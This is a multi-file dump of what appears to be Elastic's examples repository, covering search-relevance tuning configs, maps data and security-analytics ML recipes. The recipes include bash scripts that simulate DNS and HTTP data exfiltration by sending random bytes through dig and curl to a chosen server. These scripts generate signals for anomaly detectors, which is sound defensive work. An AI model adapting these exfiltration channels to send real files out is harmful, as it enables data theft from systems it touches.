4 |     "relevant_rating_threshold": 1
5 |   }
6 | }
7 | 
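This metric definition plugs into the rank evaluation API. A minimal sketch of scoring a single query against the MS MARCO document index; the query text, document id, and rating are illustrative:

```python
import json

from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")

with open("config/metric-mrr-100.json") as f:
    metric = json.load(f)

response = es.rank_eval(index="msmarco-document", body={
    "metric": metric,
    "requests": [{
        "id": "example_query",
        "request": {"query": {"match": {"body": "what is machine learning"}}},
        # Hypothetical relevance judgment for this query.
        "ratings": [{"_index": "msmarco-document", "_id": "D12345", "rating": 1}],
    }],
})

print("MRR@100:", response["metric_score"])
```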


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/msmarco-document-index.defaults.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "settings": {
 3 |     "index": {
 4 |       "number_of_shards": 1,
 5 |       "number_of_replicas": 0
 6 |     }
 7 |   },
 8 |   "mappings": {
 9 |     "dynamic": "strict",
10 |     "properties": {
11 |       "id": {
12 |         "ignore_above": 1024,
13 |         "type": "keyword"
14 |       },
15 |       "url": {
16 |         "type": "text",
17 |         "analyzer": "standard"
18 |       },
19 |       "title": {
20 |         "type": "text",
21 |         "analyzer": "english"
22 |       },
23 |       "body": {
24 |         "type": "text",
25 |         "analyzer": "english"
26 |       }
27 |     }
28 |   }
29 | }
30 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/optimize-query.best_fields.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "num_iterations": 100,
 3 |   "num_initial_points": 40,
 4 |   "space": {
 5 |     "tie_breaker": { "low": 0.0, "high": 1.0 },
 6 |     "url|boost": { "low": 0.0, "high": 10.0 },
 7 |     "title|boost": { "low": 0.0, "high": 10.0 },
 8 |     "body|boost": { "low": 0.0, "high": 10.0 }
 9 |   }
10 | }
11 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/optimize-query.cross_fields.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "num_iterations": 75,
 3 |   "num_initial_points": 30,
 4 |   "space": {
 5 |     "minimum_should_match": { "low": 30, "high": 70 },
 6 |     "tie_breaker": { "low": 0.0, "high": 1.0 },
 7 |     "url|boost": { "low": 0.0, "high": 10.0 },
 8 |     "title|boost": { "low": 0.0, "high": 10.0 },
 9 |     "body|boost": { "low": 0.0, "high": 10.0 }
10 |   },
11 |   "default": {
12 |     "operator": "OR"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/params.best_fields.baseline.json:
--------------------------------------------------------------------------------
1 | {
2 |   "tie_breaker": 0.0,
3 |   "url|boost": 1.0,
4 |   "title|boost": 1.0,
5 |   "body|boost": 1.0
6 | }
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/params.cross_fields.baseline.json:
--------------------------------------------------------------------------------
1 | {
2 |   "operator": "OR",
3 |   "minimum_should_match": 50,
4 |   "tie_breaker": 0.0,
5 |   "url|boost": 1.0,
6 |   "title|boost": 1.0,
7 |   "body|boost": 1.0
8 | }
9 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/qopt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Query Optimization/qopt/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/requirements.txt:
--------------------------------------------------------------------------------
 1 | # Please:
 2 | ## * use version pinning
 3 | ## * version pin to a major or minor version but not to a patch version (when possible)
 4 | ## * keep things organized and clear (sort alphabetically within each category)
 5 | ## * put common dependencies here
 6 | ## * use in-notebook `%pip install x` for one-off needs
 7 | 
 8 | # core
 9 | jupyterlab==2.1.*
10 | pip==20.*
11 | wheel==0.35.*
12 | 
13 | # non-core
14 | ## misc
15 | tqdm==4.38.*
16 | 
17 | ## search
18 | elasticsearch==7.*
19 | 
20 | ## data science
21 | matplotlib==3.2.*
22 | scikit-learn==0.23.*
23 | scikit-optimize==0.8.*
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20201125-elastic-optimized_best_fields/metadata.json:
--------------------------------------------------------------------------------
1 | {
2 |   "team": "Josh Devins - Elastic",
3 |   "model_description": "Elasticsearch optimized multi_match best_fields",
4 |   "paper": "https://www.elastic.co/blog/improving-search-relevance-with-data-driven-query-optimization",
5 |   "code": "https://github.com/elastic/examples/tree/master/Machine%20Learning/Query%20Optimization/",
6 |   "type": "full ranking"
7 | }
8 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20201125-elastic-optimized_best_fields/params.json:
--------------------------------------------------------------------------------
1 | {
2 |   "tie_breaker": 0.3936135232328522,
3 |   "url|boost": 0.0,
4 |   "title|boost": 8.63280262513067,
5 |   "body|boost": 10.0
6 | }
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20210120-elastic-doc2query_optimized_most_fields/metadata.json:
--------------------------------------------------------------------------------
1 | {
2 |   "team": "Josh Devins - Elastic",
3 |   "model_description": "Elasticsearch doc2query (T5) + optimized multi_match most_fields",
4 |   "paper": "https://www.elastic.co/blog/improving-search-relevance-with-data-driven-query-optimization",
5 |   "code": "https://github.com/elastic/examples/tree/master/Machine%20Learning/Query%20Optimization/",
6 |   "type": "full ranking"
7 | }
8 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20210120-elastic-doc2query_optimized_most_fields/params.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "url|boost": 5.019618907965658,
 3 |   "title|boost": 2.1715172653248564,
 4 |   "title_bigrams|boost": 0.6258343432390224,
 5 |   "body|boost": 8.97005088495938,
 6 |   "body_bigrams|boost": 0.785011613141371,
 7 |   "expansions|boost": 9.958043226768973,
 8 |   "expansions_bigrams|boost": 2.6104666149721205
 9 | }
10 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Query Optimization/tests/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/README.md:
--------------------------------------------------------------------------------
1 | This package provides a collection of examples and recipes to help you get started with the machine learning features of the Elastic Stack, which were introduced in X-Pack 5.4.
2 | 


--------------------------------------------------------------------------------
/Machine Learning/Regression Loss Functions/README.md:
--------------------------------------------------------------------------------
 1 | # Regression Loss Functions
 2 | 
 3 | This notebook explains the properties of different loss functions available for the
 4 | machine learning data frame analytics regression jobs and gives pointers on when to
 5 | choose which loss function.
 6 | 
 7 | Set up a local instance of Jupyter using the following instructions:
 8 | 
 9 | 1. Set up a virtual environment called `env` 
10 | 
11 | ```
12 | python3 -m venv env
13 | ``` 
14 | 
15 | 2. Activate it
16 | 
17 | ```
18 | source env/bin/activate
19 | ```
20 | 
21 | 3. Install the required dependencies for your chosen Jupyter notebook
22 | 
23 | ```
24 | pip install -r requirements.txt
25 | ```
26 | 
27 | 4. Launch Jupyter
28 | 
29 | ```
30 | jupyter notebook
31 | ```
32 | 
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Regression Loss Functions/requirements.txt:
--------------------------------------------------------------------------------
1 | ipykernel==5.1.3
2 | jupyter==1.0.0
3 | matplotlib==3.1.1
4 | numpy==1.18.1
5 | scikit-learn==0.22.2
6 | sympy==1.6.1
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/README.md:
--------------------------------------------------------------------------------
1 | **Update**: These recipes are largely superseded and may be outdated: the Elastic SIEM now ships built-in ML detection jobs, as described at https://www.elastic.co/guide/en/siem/guide/current/prebuilt-ml-jobs.html and https://github.com/elastic/detection-rules/tree/main/rules/ml
2 | 
3 | Each subfolder contains information that will allow you to configure, run, and test an example Security Analytics machine learning use case. Security Analytics use cases detect anomalies associated with elementary cyber attack behaviors. Each detected anomaly is assigned a normalized Anomaly Score, and is annotated with values of other fields in the data that have statistical influence on the anomaly, called influencers. Elementary attack behaviors that share common statistical influencers are often related to a common attack progression.
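4 | 
5 | As a minimal sketch of the shape of such a use case (hypothetical job id and field names chosen for illustration; the real configurations live in each subfolder under `machine_learning/`), an anomaly detection job pairs one or more detectors with the influencers used to annotate its anomalies. On recent stack versions the ML APIs live under `_ml`; the 5.x releases these recipes were written for used `_xpack/ml`:
6 | 
7 | ```
8 | curl -u elastic:changeme -H 'Content-Type: application/json' \
9 |   -X PUT 'http://localhost:9200/_ml/anomaly_detectors/example_rare_process' -d '
10 | {
11 |   "analysis_config": {
12 |     "bucket_span": "10m",
13 |     "detectors": [ { "function": "rare", "by_field_name": "process.name" } ],
14 |     "influencers": [ "host.name", "user.name" ]
15 |   },
16 |   "data_description": { "time_field": "@timestamp" }
17 | }'
18 | ```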
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/TODO:
--------------------------------------------------------------------------------
1 | 1. Update the image on the README
2 | 2. Review the README format
3 | 3. Maybe a single load script for the ingest pipeline and the job load?
4 | 4. May need to change interface from en0


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/configs/ingest/extract_subdomain.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "Adds subdomain and domain fields",
 3 |   "processors": [
 4 |     {
 5 |       "script": {
 6 |         "lang": "painless",
 7 |         "inline": "boolean isValue(def x){ x != null } if (isValue(ctx?.dns?.question?.name) && isValue(ctx?.dns?.question.etld_plus_one)) { def sub_domain = ctx.dns.question.name.replace(ctx.dns.question.etld_plus_one,''); ctx.domain = ctx.dns.question.etld_plus_one; if (sub_domain != 'www.' && sub_domain != ''){ ctx.sub_domain=sub_domain;}}"
 8 |       }
 9 |     }
10 |   ]
11 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/configs/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | packetbeat.interfaces.device: en0
 2 | packetbeat.protocols.dns:
 3 |   ports: [53]
 4 |   include_authorities: true
 5 |   include_additionals: true
 6 | name: test
 7 | output.elasticsearch:
 8 |   # Array of hosts to connect to.
 9 |   hosts: ["localhost:9200"]
10 |   # Optional protocol and basic auth credentials.
11 |   #protocol: "https"
12 |   username: "elastic"
13 |   password: "changeme"
14 |   pipeline: "extract_subdomain"
15 | #logging.level: debug
16 | logging.selectors: ["*"]


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "dns_exfiltration",
 3 |   "indexes": [
 4 |     "packetbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "dns"
 8 |   ],
 9 |   "query": {
10 |     "match_all": {}
11 |   },
12 |   "scroll_size": 1000,
13 |   "query_delay": "60s",
14 |   "frequency": "150s"
15 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "dns_exfiltration",
 3 |   "description": "dns exfiltration",
 4 |   "analysis_config": {
 5 |     "bucket_span": "5m",
 6 |     "latency": "0s",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_info_content(sub_domain) over domain",
10 |         "function": "high_info_content",
11 |         "field_name": "sub_domain",
12 |         "over_field_name": "domain",
13 |         "exclude_frequent": "ALL",
14 |         "detector_rules": []
15 |       }
16 |     ],
17 |     "influencers": [
18 |       "beat.name",
19 |       "domain"
20 |     ],
21 |     "use_per_partition_normalization": false
22 |   },
23 |   "data_description": {
24 |     "format": "delimited",
25 |     "time_field": "@timestamp",
26 |     "time_format": "epoch",
27 |     "field_delimiter": "\t",
28 |     "quote_character": "\""
29 |   },
30 |   "model_plot_config": {
31 |       "enabled" : true
32 |   }
33 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/scripts/dns_exfil_random.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | ### Trivial one-liner bash-based file exfil over dns example - random data
 3 | ###
 4 | #
 5 | # Usage: $0 <dns_server_ip> <zone suffix/hrd>
 6 | #
 7 | # Ex. ./dns_exfil_random.sh 8.8.8.8 elastic.co
 8 | #
 9 | 
10 | if [[ -n $1 && -n $2 ]]; then count=0 ; dd if=/dev/urandom bs=1 count=64k 2>/dev/null| base64 -w 63 | while read line; do line=$(echo $line |tr -d '\n') ; req=$(echo "${count}.$line") ; dig "${count}.${line}.${2}" @${1}; count=$((count+1)) ; done; fi


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/dns_data_exfiltration/scripts/dns_exfil_random_osx.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | ### OSX Trivial one-liner bash-based file exfil over dns example - random data
 3 | ###
 4 | #
 5 | # Usage: $0 <dns_server_ip> <zone suffix/hrd>
 6 | #
 7 | # Ex. ./dns_exfil_random_osx.sh 8.8.8.8 elastic.co
 8 | #
 9 | 
10 | if [[ -n $1 && -n $2 ]]; then count=0 ; dd if=/dev/urandom bs=1 count=64k 2>/dev/null| base64 -b 63 | while read line; do line=$(echo $line |tr -d '\n') ; req=$(echo "${count}.$line") ; dig "${count}.${line}.${2}" @${1}; count=$((count+1)) ; done; fi


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/configs/packetbeat/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | packetbeat.interfaces.device: en0
 2 | packetbeat.protocols.http:
 3 | #Add port here if using a port other than 3333.
 4 |   ports: [80, 8080, 8000, 5000, 8002, 3333]
 5 |   send_all_headers: true
 6 | name: test
 7 | output.elasticsearch:
 8 |   # Array of hosts to connect to.
 9 |   hosts: ["localhost:9200"]
10 |   # Optional protocol and basic auth credentials.
11 |   #protocol: "https"
12 |   username: "elastic"
13 |   password: "changeme"
14 | logging.selectors: ["*"]
15 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "http_exfiltration",
 3 |   "indexes": [
 4 |     "packetbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "http"
 8 |   ],
 9 |   "query": {
10 |     "term": {
11 |       "direction": {
12 |         "value": "out"
13 |       }
14 |     }
15 |   },
16 |   "scroll_size": 1000,
17 |   "query_delay": "60s",
18 |   "frequency": "150s"
19 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "http_exfiltration",
 3 |   "description": "http data exfiltration",
 4 |   "analysis_config": {
 5 |     "bucket_span": "5m",
 6 |     "latency": "0s",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_sum(bytes_in) over \"http.request.headers.host\" partitionfield=\"beat.name\" excludefrequent=all",
10 |         "function": "high_sum",
11 |         "field_name": "bytes_in",
12 |         "over_field_name": "http.request.headers.host",
13 |         "exclude_frequent": "all"
14 |       }
15 |     ],
16 |     "influencers": [
17 |       "beat.name",
18 |       "http.request.headers.host"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "time_field": "@timestamp"
23 |   },
24 |   "model_plot_config": {
25 |       "enabled" : true
26 |   }
27 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/scripts/client.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | ### Client side script to send random data over HTTP to imitate an HTTP exfiltration signature.
 4 | ### This script relies on a receiving server - this is provided through server.sh.
 5 | #
 6 | # Usage: $0 <server_host> [server_port]
 7 | #  - <server_host>. Required.
 8 | #  - <server_port> optional and defaults to 3333
 9 | #
10 | # Ex. ./client.sh localhost
11 | #
12 | 
13 | if [ -z "$1" ]
14 |   then
15 |     echo "No hostname supplied - Usage: $0 <hostname> [port]"
16 |     exit 1
17 | fi
18 | 
19 | HOST=$1
20 | 
21 | PORT=3333
22 | if [ "$2" ]; then
23 |   PORT=$2
24 | fi
25 | 
26 | while true; do
27 |     cmd=$(dd if=/dev/urandom bs=1 count=1k 2>/dev/null |  curl -s -X POST -H "Content-Type: text/plain" --data-binary @- $HOST:$PORT)
28 | done


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/http_data_exfiltration/scripts/server.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | ### Simple HTTP server to receive bytes over HTTP. To be used in conjunction with client.sh to receive random bytes and imitate an HTTP exfiltration signature.
 4 | #
 5 | # Usage: $0 <port>
 6 | #  - <port> defaults to 3333
 7 | #
 8 | # Ex. ./server.sh 5555
 9 | #
10 | PORT=3333
11 | if [ "$2" ]; then
12 |   PORT=$2
13 | fi
14 | 
15 | socat \
16 |     TCP-LISTEN:$PORT,crlf,reuseaddr,fork \
17 |     SYSTEM:"
18 |         echo HTTP/1.1 200 OK;
19 |         echo Content-Type\: text/plain;
20 |         echo Content-Length\: 0;
21 |         echo;
22 |         echo;
23 |     "
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.modules:
 2 | - module: system
 3 |   syslog:
 4 |     enabled: false
 5 |   auth:
 6 |     enabled: true
 7 |     var.paths: ["/opt/demos/ml-recipes/recipes/security/suspicious_login_activity/data/auth.log"]
 8 | name: test
 9 | output.elasticsearch:
10 |   # Array of hosts to connect to.
11 |   hosts: ["localhost:9200"]
12 |   # Optional protocol and basic auth credentials.
13 |   #protocol: "https"
14 |   username: "elastic"
15 |   password: "changeme"
16 |   index: "filebeat"
17 | logging.level: debug
18 | logging.selectors: ["publish"]


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-suspicious_login_activity",
 3 |   "job_id": "suspicious_login_activity",
 4 |   "indexes": [
 5 |     "filebeat-*"
 6 |   ],
 7 |   "types": [
 8 |     "doc"
 9 |   ],
10 |   "query": {
11 |       "query_string": {
12 |         "query": "system.auth.ssh.event:Failed OR system.auth.ssh.event:Invalid",
13 |         "fields": [],
14 |         "use_dis_max": true,
15 |         "auto_generate_phrase_queries": false,
16 |         "max_determinized_states": 10000,
17 |         "enable_position_increments": true,
18 |         "fuzziness": "AUTO",
19 |         "fuzzy_prefix_length": 0,
20 |         "fuzzy_max_expansions": 50,
21 |         "phrase_slop": 0,
22 |         "analyze_wildcard": true,
23 |         "escape": false,
24 |         "split_on_whitespace": true,
25 |         "boost": 1
26 |       }
27 |   },
28 |   "scroll_size": 1000,
29 |   "query_delay": "60s",
30 |   "frequency": "150s"
31 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_login_activity/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "suspicious_login_activity",
 3 |   "description": "suspicious login activity",
 4 |   "job_type": "anomaly_detector",
 5 |   "analysis_config": {
 6 |     "bucket_span": "5m",
 7 |     "detectors": [
 8 |       {
 9 |         "detector_description": "high_count",
10 |         "function": "high_count",
11 |         "partition_field_name": "system.auth.hostname",
12 |         "detector_rules": []
13 |       }
14 |     ],
15 |     "influencers": [
16 |       "system.auth.hostname",
17 |       "system.auth.user",
18 |       "system.auth.ssh.ip"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "time_field": "@timestamp",
23 |     "time_format": "epoch_ms"
24 |   },
25 |   "model_plot_config": {
26 |       "enabled" : true
27 |   }
28 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | ###################### Filebeat Configuration Example #########################
 2 | 
 3 | #==========================  Modules configuration ============================
 4 | name: test
 5 | 
 6 | filebeat.modules:
 7 | #------------------------------- Auditd Module -------------------------------
 8 | - module: auditd
 9 |   log:
10 |     prospector:
11 |       include_lines: ['^type=EXECVE']
12 | 
13 | #================================ Outputs =====================================
14 | 
15 | #-------------------------- Elasticsearch output ------------------------------
16 | output.elasticsearch:
17 |   # Array of hosts to connect to.
18 |   hosts: ["localhost:9200"]
19 |   username: "elastic"
20 |   password: "changeme"


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-unusual_process",
 3 |   "job_id": "unusual_process",
 4 |   "query": {
 5 |     "term": {
 6 |       "auditd.log.record_type": {
 7 |         "value": "EXECVE"
 8 |       }
 9 |     }
10 |   },
11 |   "query_delay": "60s",
12 |   "frequency": "300s",
13 |   "scroll_size": 1000,
14 |   "indexes": [
15 |     "filebeat-*"
16 |   ],
17 |   "types": [
18 |     "doc"
19 |   ]
20 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "unusual_process",
 3 |   "description": "unusual process",
 4 |   "analysis_config": {
 5 |     "bucket_span": "10m",
 6 |     "influencers": [
 7 |       "auditd.log.a0",
 8 |       "beat.name"
 9 |     ],
10 |     "detectors": [
11 |       {
12 |         "function": "rare",
13 |         "by_field_name": "auditd.log.a0",
14 |         "partition_field_name": "beat.name"
15 |       }
16 |     ]
17 |   },
18 |   "data_description": {
19 |     "time_field": "@timestamp",
20 |     "time_format": "epoch_ms"
21 |   },
22 |   "model_plot_config": {
23 |       "enabled" : true
24 |   }
25 | }


--------------------------------------------------------------------------------
/Machine Learning/Security Analytics Recipes/suspicious_process_activity/scripts/start_random_process.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | # Generate a random 8-hex-character process name and run a short-lived
3 | # process under that name, so it shows up as a rarely seen process start.
4 | file_name=$(hexdump -n 4 -e '4/4 "%08X" 1 "\n"' /dev/random)
5 | echo "$file_name"
6 | bash -c "exec -a $file_name sleep 10"


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/bangor_international_airport.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "bangor_international_airport",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "Point", "coordinates": [ -68.825774282298767, 44.80601309218136 ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/logan_international_airport.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "logan_international_airport",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "Point", "coordinates": [ -71.004550070725642, 42.364101185471185 ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/modified_flight_path.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "original_flight_path",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "LineString", "coordinates": [ [ -71.00192980731326, 42.362430078961033 ], [ -70.919524749846204, 43.6519362548866 ], [ -70.599875089458095, 44.29554107328692 ], [ -69.592677689750033, 44.672089214951654 ], [ -68.829108982759479, 44.808036568889044 ] ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Maps/Getting Started Examples/geojson_upload_and_styling/original_flight_path.geojson:
--------------------------------------------------------------------------------
1 | {
2 | "type": "FeatureCollection",
3 | "name": "original_flight_path",
4 | "crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
5 | "features": [
6 | { "type": "Feature", "properties": { }, "geometry": { "type": "LineString", "coordinates": [ [ -71.001880654548103, 42.362468962533292 ], [ -69.82139571080863, 43.267559778102239 ], [ -68.92614280820797, 44.381551026535575 ], [ -68.829108982759479, 44.808036568889044 ] ] } }
7 | ]
8 | }
9 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/__init__.py


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/elastic{ON}_full_floor_plan.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/elastic{ON}_full_floor_plan.pdf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/requirements.txt:
--------------------------------------------------------------------------------
1 | appdirs==1.4.3
2 | elasticsearch==5.3.0
3 | packaging==16.8
4 | pyparsing==2.2.0
5 | six==1.10.0
6 | urllib3==1.21
7 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_booths.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.prj:
--------------------------------------------------------------------------------
1 | GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qix


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.qpj:
--------------------------------------------------------------------------------
1 | GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]
2 | 


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shp


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/demo_stands.shx


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.dbf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Miscellaneous/custom_tile_maps/shape_files/inner_wall.dbf


--------------------------------------------------------------------------------
/Miscellaneous/custom_tile_maps/shape_files/inner_wall.prj:
--------------------------------------------------------------------------------
